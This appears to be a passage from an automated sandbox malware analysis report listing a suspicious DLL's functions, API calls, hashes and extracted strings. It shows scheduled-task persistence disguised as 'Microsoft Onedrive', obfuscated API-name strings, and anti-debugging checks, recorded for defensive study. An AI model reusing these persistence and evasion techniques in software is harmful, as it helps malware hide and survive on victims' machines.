                  • Cannot get identification pointer: %x, xrefs: 6CDF1E1F
                  • Trigger1, xrefs: 6CDF1F47
                  • QueryInterface call failed on IRegistrationTrigger: %x, xrefs: 6CDF1F3D
                  • Cannot get Task collection pointer: %x, xrefs: 6CDF1FFF
                  • Cannot put the action executable path: %x, xrefs: 6CDF20E9
                  • ITaskService::Connect failed: %x, xrefs: 6CDF1D75
                  • Microsoft Onedrive, xrefs: 6CDF1E29
                  • Cannot create a registration trigger: %x, xrefs: 6CDF1F0F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: Variant$ClearInit$Uninitialize$CreateInitializeInstance
                  • String ID: Success! Task successfully registered. $Cannot create a registration trigger: %x$Cannot create action: %x$Cannot get Task collection pointer: %x$Cannot get identification pointer: %x$Cannot get settings pointer: %x$Cannot get trigger collection: %x$Cannot put identification info: %x$Cannot put registration trigger delay: %x$Cannot put setting info: %x$Cannot put the action executable path: %x$Cannot put trigger ID: %x$Error saving the Task : %x$QueryInterface call failed for IExecAction: %x$QueryInterface call failed on IRegistrationTrigger: %x$Cannot get Root Folder pointer: %x$Failed to create a task definition: %x$Failed to create an instance of ITaskService: %x$ITaskService::Connect failed: %x$Microsoft Onedrive$PCATaskServices$Trigger1
                  • API String ID: 3466238963-2259768170
                  • Opcode ID: 3f67ee80d5479e7fecc40e33d3d1b890059a2aefb64ff10d8d46c55ccf953b69
                  • Instruction ID: 0d9191b99529e7dfe2fa6a4fdbcba8fb98dce4d65967af7406b621bcf92443c3
                  • Opcode Fuzzy Hash: 3f67ee80d5479e7fecc40e33d3d1b890059a2aefb64ff10d8d46c55ccf953b69
                  • Instruction Fuzzy Hash: D0225C71A04159EFDB00DFA4C848DDF7BB9FF8A318B154649F815AB650DB31E906CBA0
                  Function 6CE041DB Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: __floor_pentium4
                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                  • API String ID: 4168288129-2761157908
                  • Opcode ID: 3514c52e61dc72e32d345e26c9691340954344e1b5385096e598779c4e878252
                  • Instruction ID: 52e00e08a45424be6a6b8ca759c16d6af246b1035f458b2f477e42193423fc67
                  • Opcode Fuzzy Hash: 3514c52e61dc72e32d345e26c9691340954344e1b5385096e598779c4e878252
                  • Instruction Fuzzy Hash: F5D25A71E092288FDB64CE28CD407DAB7B5FB55309F2441EAD40DE7640EB78AE958F81
                  Function 6CE03D30 Relevance: 6.5, APIs: 4, Instructions: 455COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 362ef1cc790e621639e128e73b9871dfcc67a5d3f97bb9d42cbb1d692720c59a
                  • Instruction ID: 8f9114e3bcab13c2d5c7dbf33fd3d9098a92bd24c42997b547f7e8202b67d6a5
                  • Opcode Fuzzy Hash: 362ef1cc790e621639e128e73b9871dfcc67a5d3f97bb9d42cbb1d692720c59a
                  • Instruction Fuzzy Hash: 80026C71E012199BDB14CFA9C980ADEFBF1FF58318F24826AD519E7781D731A916CB80
                  Function 6CDF3621 Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6CDF362D
                  • IsDebuggerPresent.KERNEL32 ref: 6CDF36F9
                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CDF3712
                  • UnhandledExceptionFilter.KERNEL32(?), ref: 6CDF371C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                  • String ID:
                  • API String ID: 254469556-0
                  • Opcode ID: 1fc575a190d65336665f269fff2abba6c97669446670aae2d412a08b1bcab73d
                  • Instruction ID: 7057dce7e64a2dea43bb51cd22aebe137a5eefc2aeba7e31e8cd9947e0e0ab53
                  • Opcode Fuzzy Hash: 1fc575a190d65336665f269fff2abba6c97669446670aae2d412a08b1bcab73d
                  • Instruction Fuzzy Hash: 823127B5D05218DBDF20DFA4D9897CDBBB8BF08304F1141AAE41CAB250EB719A858F45
                  Function 6CDFBADE Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 6CDFBBD6
                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 6CDFBBE0
                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000001), ref: 6CDFBBED
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                  • String ID:
                  • API String ID: 3906539128-0
                  • Opcode ID: d09a2f3d1d764d5623a45356df48aea357cbee013d4d4335dcae13ae02dd87bc
                  • Instruction ID: 494d3dcebca5c87b11b1324d77477c5359f36c3f41ef6825c222fa01251a05a3
                  • Opcode Fuzzy Hash: d09a2f3d1d764d5623a45356df48aea357cbee013d4d4335dcae13ae02dd87bc
                  • Instruction Fuzzy Hash: 7631A67590121CEBCB21DF64D988BCDBBB4BF08314F5141DAE41CA72A0EB749B858F55
                  Function 6CE09919 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • RaiseException.KERNEL32(C000000D,00000000,00000001,00000001,?,00000008,?,?,6CE09914,00000001,?,00000008,?,?,6CE09517,00000000), ref: 6CE09B46
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: ExceptionRaise
                  • String ID:
                  • API String ID: 3997070919-0
                  • Opcode ID: ab7bb21cdba639fe2befd461e11f15a7816e3e8401b132d0c56956904dfd8b77
                  • Instruction ID: 77dc1db37ba542f1be72cd503d078962af01de7894e3bed60913ecbe19f639fa
                  • Opcode Fuzzy Hash: ab7bb21cdba639fe2befd461e11f15a7816e3e8401b132d0c56956904dfd8b77
                  • Instruction Fuzzy Hash: 82B137316216099FD705CF28C486B557BF0FF45368F358658E8A9CF6A1C335E9A2CB84
                  Function 6CDF381B Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                  Download Yara Rule
                  APIs
                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CDF3831
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: FeaturePresentProcessor
                  • String ID:
                  • API String ID: 2325560087-0
                  • Opcode ID: 19e1a1176865ef58d2905729bd23296a0e21bb58317054d39adb699e70b50687
                  • Instruction ID: 3caccfe36613687c54292cc3b4dec957dbcc7522240f2425cac68644bc2f7f3c
                  • Opcode Fuzzy Hash: 19e1a1176865ef58d2905729bd23296a0e21bb58317054d39adb699e70b50687
                  • Instruction Fuzzy Hash: 8B51C0B1A15609DFEB04CF95D48279EBBF0FB85304F22816AC421EBA90D375E991CF51
                  Function 6CE02BA7 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: HeapProcess
                  • String ID:
                  • API String ID: 54951025-0
                  • Opcode ID: cc424cd87dc3fb5dfb12eb40c03a994bd3e22559fd57ec7cbc76ca48f43aa789
                  • Instruction ID: 25cae636e3534881f3df93b7c032f89b6b54456407e3843a89ad024f51935d2c
                  • Opcode Fuzzy Hash: cc424cd87dc3fb5dfb12eb40c03a994bd3e22559fd57ec7cbc76ca48f43aa789
                  • Instruction Fuzzy Hash: 54A011B0B00200CB8B008F32820A20C3AF8BB0AA88300802AA228C0A00EB2080208A80
                  Function 6CDF9959 Relevance: .4, Instructions: 385COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3a0688953b8229d36f3f729b3109c13c1692770998b7d115b43c92da77dfaa8d
                  • Instruction ID: c52cb0e2635e79ad48ba41dbd70e5b36d683ae0d47335511580f40522514783a
                  • Opcode Fuzzy Hash: 3a0688953b8229d36f3f729b3109c13c1692770998b7d115b43c92da77dfaa8d
                  • Instruction Fuzzy Hash: EED1AC30E01606CFCB14DF69C590AAAB7B1FF45318F225619D57A9BBB0D330A987CB50
                  Function 6CDF95FA Relevance: .3, Instructions: 333COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b2b18fe3246c76dc307690f3d0a7eb3827e0edc18df1346a820f55dee45cc28c
                  • Instruction ID: b8d3061c45f3a3595798a3389f45c08cfbbed54a6f7807aa6b64ae967e277001
                  • Opcode Fuzzy Hash: b2b18fe3246c76dc307690f3d0a7eb3827e0edc18df1346a820f55dee45cc28c
                  • Instruction Fuzzy Hash: FBC1BB34D0574ACFC715CF69C580AAEBBB1BB06318F224619D4B697EB0C731A94BCB61
                  Function 6CDF92B8 Relevance: .3, Instructions: 318COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5191a47a0b446d7300654493dc4f987b40672c006d093a1fc7eb273ca4c1194d
                  • Instruction ID: a289070ebf5775f0ad4752aec457140e8668ab9446b0843e26e683f5046d0e6b
                  • Opcode Fuzzy Hash: 5191a47a0b446d7300654493dc4f987b40672c006d093a1fc7eb273ca4c1194d
                  • Instruction Fuzzy Hash: 1EB1AE70D0560ACACB15CF68C490AAEB7F1BB4530CF16061ED8B697FB0C762A647CB55
                  Function 6CE06329 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                    • Part of subcall function 6CE06070: CreateFileW.KERNEL32(00000000,00000000,?,6CE063D2,?,?,00000000,?,6CE063D2,00000000,0000000C), ref: 6CE0608D
                  • GetLastError.KERNEL32 ref: 6CE0643D
                  • __dosmaperr.LIBCMT ref: 6CE06444
                  • GetFileType.KERNEL32(00000000), ref: 6CE06450
                  • GetLastError.KERNEL32 ref: 6CE0645A
                  • __dosmaperr.LIBCMT ref: 6CE06463
                  • CloseHandle.KERNEL32(00000000), ref: 6CE06483
                  • CloseHandle.KERNEL32(00000000), ref: 6CE065D0
                  • GetLastError.KERNEL32 ref: 6CE06602
                  • __dosmaperr.LIBCMT ref: 6CE06609
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                  • String ID: H
                  • API String ID: 4237864984-2852464175
                  • Opcode ID: d3f22ef862b965942c272c16a11c98257fb83b5597d972cfd745b84c5de87379
                  • Instruction ID: 45b338f39885e80bcd4acd9d75af6a638e8c99389cca5c9b90409eb0be9cac87
                  • Opcode Fuzzy Hash: d3f22ef862b965942c272c16a11c98257fb83b5597d972cfd745b84c5de87379
                  • Instruction Fuzzy Hash: 5EA11332B041559FCF098F68C851BAE7BB5AB47328F24024DEC11DB791DB358966CBD1
                  Function 6CDF1274 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 149libraryloaderCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNEL32(kernel32.dll,000003E8,00000000,00000000), ref: 6CDF12AB
                  • GetProcAddress.KERNEL32(?), ref: 6CDF131D
                  • GetProcAddress.KERNEL32(?), ref: 6CDF1388
                  • GetProcAddress.KERNEL32(?), ref: 6CDF13F6
                  Strings
                  • QtAoBKRBQRAvBKZBbRAzBD;BadAwBDVBadA3BEZBZRAzBDhBZRAjBDtBYRA[BB>>, xrefs: 6CDF12B1
                  • QdAsBD7BYBALBDVBfBA3BFZBbRApBDVBUtB>, xrefs: 6CDF1325
                  • kernel32.dll, xrefs: 6CDF12A6
                  • QdAsBD7BYBADBDhB`dAyBKRBQdAsBDtBYRA[BB>>, xrefs: 6CDF1395
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: QdAsBD7BYBADBDhB`dAyBKRBQdAsBDtBYRA[BB>>$QdAsBD7BYBALBDVBfBA3BFZBbRApBDVBUtB>$QtAoBKRBQRAvBKZBbRAzBD;BadAwBDVBadA3BEZBZRAzBDhBZRAjBDtBYRA[BB>>$kernel32.dll
                  • API String ID: 667068680-2765630095
                  • Opcode ID: 45564cd1df150ab7dbbc628e6f45e0c53d7915506d181a82d16ca34f192e5ad7
                  • Instruction ID: 425c6344d658a48c52f5a1f54e224fa0f0ec4f1c6bfd8078fbe2181997159c11
                  • Opcode Fuzzy Hash: 45564cd1df150ab7dbbc628e6f45e0c53d7915506d181a82d16ca34f192e5ad7
                  • Instruction Fuzzy Hash: 235106B1D002889BCB25CFA8DC919EEBBB4BF49308F15812DD961D7B51EB31951DCB60
                  Function 6CE06710 Relevance: 13.9, APIs: 9, Instructions: 354COMMON
                  Download Yara Rule
                  APIs
                  • mydllmain.UIFTTNKL2R(00000000,?), ref: 6CE067C7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: mydllmain
                  • String ID:
                  • API String ID: 979097349-0
                  • Opcode ID: 72b7d4d62d11674e5481037c0333d9c038b14fca1d2a74066183c7589bf8a711
                  • Instruction ID: 67f4da6d1bec6f5e9f1b6000aa58b14403ff77c4906f81fe86b027ad3a7ee607
                  • Opcode Fuzzy Hash: 72b7d4d62d11674e5481037c0333d9c038b14fca1d2a74066183c7589bf8a711
                  • Instruction Fuzzy Hash: F9E15D31F4422A8BCB25CF1889817DDB7B9AB59304F2481E9D898E7B01D670AED48FD0
                  Function 6CDF4786 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • type_info::operator==.LIBVCRUNTIME ref: 6CDF48A5
                  • ___TypeMatch.LIBVCRUNTIME ref: 6CDF49B3
                  • _UnwindNestedFrames.LIBCMT ref: 6CDF4B05
                  • CallUnexpected.LIBVCRUNTIME ref: 6CDF4B20
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                  • String ID: csm$csm$csm
                  • API String ID: 2751267872-393685449
                  • Opcode ID: e4c5e4d7f6205273afa9c9b04dd51d1405daa3bcc43178d3e99fb498a2080327
                  • Instruction ID: 997eff579f9f4d4b10920e0034ec8fdb8b0fdf839abcc3950d48b6f17865fbb3
                  • Opcode Fuzzy Hash: e4c5e4d7f6205273afa9c9b04dd51d1405daa3bcc43178d3e99fb498a2080327
                  • Instruction Fuzzy Hash: A2B16A71804219EFCF05CFA5CA8099EB7B5BF04318F16425AE9307BA21D731DA56CFA6
                  Function 6CDF4090 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122COMMON
                  Download Yara Rule
                  APIs
                  • _ValidateLocalCookies.LIBCMT ref: 6CDF40C7
                  • ___except_validate_context_record.LIBVCRUNTIME ref: 6CDF40CF
                  • _ValidateLocalCookies.LIBCMT ref: 6CDF4158
                  • __IsNonwritableInCurrentImage.LIBCMT ref: 6CDF4183
                  • mydllmain.UIFTTNKL2R(?,00000001), ref: 6CDF419C
                  • _ValidateLocalCookies.LIBCMT ref: 6CDF41D8
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_recordmydllmain
                  • String ID: csm
                  • API String ID: 2845398917-1018135373
                  • Opcode ID: e27e630f3de56f3f9abe7f793f8af1083c37b4ce17176d04900e3f2ed5ccbfae
                  • Instruction ID: 25bc80b62971eac95ec2666a3ab8c38fb621d7975d24c8010b6569e63c649116
                  • Opcode Fuzzy Hash: e27e630f3de56f3f9abe7f793f8af1083c37b4ce17176d04900e3f2ed5ccbfae
                  • Instruction Fuzzy Hash: F4418334A01209DFCF00DF69C980A9EBBB5FF45328F15815AE8389BB61D731DA56CB91
                  Function 6CDFE73F Relevance: 10.8, APIs: 7, Instructions: 329COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: _strrchr
                  • String ID:
                  • API String ID: 3213747228-0
                  • Opcode ID: dccc5fed7eae1ac0f2b9dc4a4a5c9194eecbad04fa69afc9fd44217c599bdb86
                  • Instruction ID: bde302714e3582dea2042b3f93d2c5c0a3a3695a4739685e07f364c0e2e0b923
                  • Opcode Fuzzy Hash: dccc5fed7eae1ac0f2b9dc4a4a5c9194eecbad04fa69afc9fd44217c599bdb86
                  • Instruction Fuzzy Hash: 61B14432A05399DFEB118F68C880BAEBBB5FF46314F164155E864ABB91D3749902C7E0
                  Function 6CE01EAA Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID:
                  • String ID: 3 l$C:\Windows\system32\loaddll32.exe
                  • API String ID: 0-1795641527
                  • Opcode ID: b6a2112bbe9228fb9c9d048d777419a38d09d1f1061546018f3a1f7f2f9ee234
                  • Instruction ID: 79067004ee339bce1677c60b3ff8fa11fbe43582b9e005394efbfee4124cc4d1
                  • Opcode Fuzzy Hash: b6a2112bbe9228fb9c9d048d777419a38d09d1f1061546018f3a1f7f2f9ee234
                  • Instruction Fuzzy Hash: 92215E31708206AF9B109FE6CC4199B77B9BF423AC7254619E864DBF50E731E82587E0
                  Function 6CDFF7B5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
